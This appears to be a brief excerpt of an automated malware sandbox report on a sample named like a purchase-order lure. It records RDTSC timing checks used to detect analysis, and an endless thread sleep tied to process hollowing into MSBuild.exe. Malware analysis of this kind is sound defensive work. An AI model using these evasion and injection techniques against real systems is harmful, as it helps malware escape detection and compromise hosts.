Source: C:\Windows\SysWOW64\raserver.exe; RDTSC instruction interceptor: First address: 000000000066876E second address: 0000000000668774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Thread delayed: delay time: 922337203685477 (Int64.MaxValue 100 ns ticks expressed in milliseconds, i.e. TimeSpan.MaxValue: a sleep that never returns on its own, so the .NET stage waits indefinitely once the hollowed host has been started)